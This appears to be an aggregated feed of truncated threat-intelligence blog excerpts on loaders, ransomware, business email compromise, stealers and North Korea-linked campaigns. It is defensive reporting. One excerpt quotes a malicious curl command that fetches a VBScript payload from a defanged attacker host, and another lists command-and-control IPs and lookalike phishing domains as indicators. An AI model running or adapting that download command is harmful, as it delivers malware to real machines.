In our daily botnet analysis work, it is common to encounter various loaders.Compared to other types of malware, loaders are unique in that they are mainly used to “promote”, i.e., download and run other malware on the infected machine. According to our observations, most loaders are proprietary and have a binding relationship with the family they are promoting.…
The ASEC analysis team has discovered the continuous distribution of malicious Word files targeting specific individuals related to national defense and North Korea. Most of the confirmed Word files had filenames that included the names of individuals related to North Korea. It is likely that this attack is being perpetrated on those related to the field.…
Recently, there have been frequent incidents where attackers infiltrated and took control of the internal network of Korean companies, starting with vulnerable servers externally exposed.
This is a case of infiltration into an IIS web server or an MS Exchange server and is the same as previously known types.…
The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl.
The commands discovered so far are as follows:
curl -H ”user-agent: chrome/103.0.5060.134 safari/537.32” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%vbtemp cmd /c cd > %appdata%tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs…Mitiga spotted a sophisticated, advanced business email compromise (BEC) campaign, directly targeting relevant executives of organizations (mostly CEOs and CFOs) usingOffice 365. The attackers combine high-end spear-phishing with an adversary-in-the-middle (AiTM) attack to circumvent multi-factor authentication (MFA) and a Microsoft 365 design flaw that allows them to create access persistency with MFA.…
BlueSky ransomware is an emerging threat that researchers have been paying increasing attention to since its initial discovery in late June 2022. The ransomware has been observed being spread via trojanized downloads from questionable websites as well as in phishing emails.
Although infections at this time remain low, the ransomware’s characteristics, described below, suggest it has been carefully developed for a sustained campaign.…
Research by: Moshe Marelus
Highlights:Check Point Research (CPR) detected a Turkish based crypto miner malware campaign, dubbed ‘Nitrokod’, which infected machines across 11 countries
The malware is dropped from popular software available on dozens of free software websites
The malware distributers separate malicious activity from the downloaded fake software to avoid detection
Attack was initially found by Check Point XDR, which overcomes the attack’s evasion mechanism. …
Read More
Mini Stealer’s Builder & Panel released for free
Read More During a routine threat hunting exercise, Cyble Research and Intelligence Labs (CRIL) discovered a post on a cybercrime forum where a Threat Actor (TA) released MiniStealer’s builder and panel for free.
The TA claims that the stealer can target operating systems such as Windows 7, 10, and 11.…
Remcos is a remote access trojan – a malware used to take remote control over infected PCs.This trojan is created and sold to clients by a “business” called Breaking Security.
Although Breaking Security promises that the program is only available to those who intend to use it for legal purposes, in reality, Remcos RAT gives clients all the necessary features to launch potentially destructive attacks.…
Last week, I was teaching FOR610 in Amsterdam. When we review ASM, we have a module about the difference in 32-bits VS. 64-bits code (how parameters are passed to functions/API calls, calling convention, etc). It’s important to have an understanding of this because most computers are build around a 64-bits CPU today.…
IP;C&C domains
45[.]76[.]80[.]199;twiiio-sso[.]com, box-okta[.]org, kucoin-pin[.]com, boxokta[.]com, kucoin-sso[.]com 66[.]42[.]107[.]233;slack-mailchimp[.]com 45[.]32[.]66[.]165;microsoft-sso[.]net, sendgrid-okta[.]org, mlcrosoft[.]info, mlcrosoft[.]cloud 45[.]76[.]238[.]53;ouryahoo-okta[.]org, ouryahooinc-okta[.]com 155[.]138[.]240[.]251;sykes-sso[.]com, internai-customer[.]io, ouryahoo-okta[.]com, ouryahoo-okta[.]net, techmahindra-sso[.]com 149[.]28[.]37[.]137;qualfon-sso[.]com, twiiio[.]net, twiiio[.]org, teleperformanceusa-sso[.]com, tmo-sso[.]net, okta-sso[.]net 149[.]248[.]1[.]50;att-mfa[.]com, att-rsa[.]com 108[.]61[.]119[.]20;mcsupport-okta[.]com, mailgun-okta[.]com, sprint-idg[.]net 149[.]28[.]212[.]53;tmobie[.]net 140[.]82[.]63[.]209;kucoinpin[.]com, kucoinpin[.]net, twiiio-okta[.]net 144[.]202[.]82[.]47;kucoin-pin[.]net, kucoin-sso[.]net 45[.]63[.]39[.]116;telus-sso[.]com 149[.]248[.]62[.]54;rogers-rci[.]net, rogers-ssp[.]com, iqor-duo[.]net, iqor-portal[.]com, cgslnc-okta[.]com, conexusonline[.]com, klaviyo-sso[.]com 66[.]42[.]91[.]138;arise-okta[.]com 216[.]128[.]141[.]52;rogers-rci[.]com,…
By Adithya Chandra · August 24, 2022This blog was also written by Sushant Kumar Arya
Executive summaryThe Trellix SecOps Team has observed an uptick in the Qbot malware infections in recent months. Qbot has been an active threat for over 14 years and continues to evolve, adopting new infection vectors to evade detection mechanisms.…
Key points
The Black Hat network is more unique and complex than a standard enterprise network due to the number and diversity of devices connected, the abundance of trainings and labs that occur, and the rapid nature of the engagement itself. Over the course of the conference, our IronDefense NDR solution generated 31 malicious alerts and 45 suspicious alerts, detecting both real malware activity and simulated attack tactics from classes and demos.…A new piece of ransomware written in the Go language has been targeting healthcare and education enterprises in Asia and Africa. This ransomware is called Agenda and is customized per victim.
We recently discovered a new piece of targeted ransomware that was created in the Go programming language and that explicitly targeted one of our customers.…
BleachGap ransomware was first reported in Feb 2021 by a researcher named Petrovic on Twitter. This ransomware variant that we have analysed was reported on Twitter in June 2022. This variant got us curious to get into the nuances of it because it was tagged as a stealer and all the code was compiled in a single executable thereby not needing any supporting .bat…
New .NET-Based Ransomware Performs Targeted Attack
Read More Several organizations, big or small, have been facing threats from Threat Actors (TAs) at a greater frequency than ever before. An organization’s primary danger remains losing access to their systems and data, which is further aggravated by the threat of TAs leaking the data if ransom requests are not fulfilled or the victim reaches out to law enforcement authorities. …
Found in Environments Protected By: Microsoft
By Nathaniel Sagibanda, Cofense Phishing Defense Center
Customer feedback is always important for organizations of all sizes. There are several well-known companies that offer different kinds of feedback tools. But what if, however, those customer feedback systems were utilized to launch Phishing attacks?…
We investigate mhyprot2.sys, a vulnerable anti-cheat driver for the popular role-playing game Genshin Impact. The driver is currently being abused by a ransomware actor to kill antivirus processes and services for mass-deploying ransomware.
There have already been reports on code-signed rootkits like Netfilter, FiveSys, and Fire Chili.…
A malicious campaign spreading the information stealer, AgentTesla, began circulating mid-August. The bad actors behind the campaign are going after information about victims’ computers and login credentials stored in browsers.
Phishing emails, sent from spoofed email addresses, with a malicious attachment are being sent to businesses across South America and Europe.…
Kimsuky (also known as Thallium, Black Banshee and Velvet Chollima) is a prolific and active threat actor primarily targeting Korea-related entities. Like other sophisticated adversaries, this group also updates its tools very quickly. In early 2022, we observed this group was attacking the media and a think-tank in South Korea and reported technical details to our threat intelligence customer.…